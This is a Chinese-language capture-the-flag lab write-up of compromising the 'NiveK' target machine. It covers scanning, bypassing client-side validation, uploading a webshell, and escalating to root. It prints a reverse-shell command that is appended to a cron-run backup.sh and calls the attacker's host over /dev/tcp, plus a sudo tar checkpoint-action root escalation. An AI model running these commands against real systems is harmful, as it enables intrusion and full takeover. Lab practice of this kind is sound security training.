NiveK 靶场渗透记录
一、日常扫ip
靶机IP:192.168.44.129
kali:192.168.44.128
二、日常扫端口
开放端口:21 ftp / 22 ssh / 7080 http,可以看到ftp给了登录名 Anonymous 但是没有密码,姑且尝试一下。
三、21ftp查看
密码为空,登录是登录成功了,但是毛都没有…
四、7080查看
是个医院登录页面,用户名和密码都没有,先用sqlmap尝试一下吧
失败…先扫目录吧
五、日常扫目录
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ybIoc6nx-1673857389520)(C:\Users\ivers\AppData\Roaming\Typora\typora-user-images\image-20230116154128161.png)]
貌似也没有什么有用的信息… 卡住了 , 我靠…
看看页面源码吧~~
乱输入尝试了下,发现有前端验证,是不是前端挡住了,没去后台,所有找不到注入点.
果断F12 查看一下
果然是这里有验证,删掉,再试一下~
我靠~~~~牛逼!
主页看到了,查找看看有没有文件上传点.
找了半天,可惜没有. 但是源码中发现了线索。
这里注释了一个页面,试了一下,有这个页面,还藏了上传点~~~
六、挂马反弹shell
F12查看一波,上传地址,kali nc 监听一波就搞定了~~~~走起!
七、提权
先换个shell
python -c "import pty;pty.spawn('/bin/bash')"
查看一波用户:daemon
sudo -l 查看一下
需要密码,看来不行,再尝试一下找一下sudo权限可执行文件吧。
发现bin/bash,果断执行一下
貌似没什么变化,shell前名变了~~~ = 。= |||
文件里搜罗一下吧。
niveK 的home目录下,发现local.txt, cat 发现第一个flag
eren用户的目录无法查看,提示权限不足。看来先要想办法切成eren用户
找了半天,卡主~~攻略了下,我靠,原来前面的/bin/bash 没有加 -p ,所以权限没有提升~
这他喵…(这里的-p其实还是没弄懂)
算了,进去目录看吧~~~~
/etc/下看到好多定时任务,home目录下返现backup.sh可执行文件
查看了定时任务文件crontab,发现很多定时任务,其中就有backup.sh,5分钟执行一次,可以拿那个文件再反弹个高权限shell过来。
刚好,这个文件eren 可读可写,echo了反弹shell 的命令进去,kali 开启nc,等待就好…
echo 'bash -i >& /dev/tcp/192.168.44.128/4444 0>&1' >> backup.sh
感觉等了一年~~我靠!
拿到eren的shell,sudo -l 查看,发现tar命令 ,查一下提权方法!
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
root账户到手,提权成功!
渗透结束!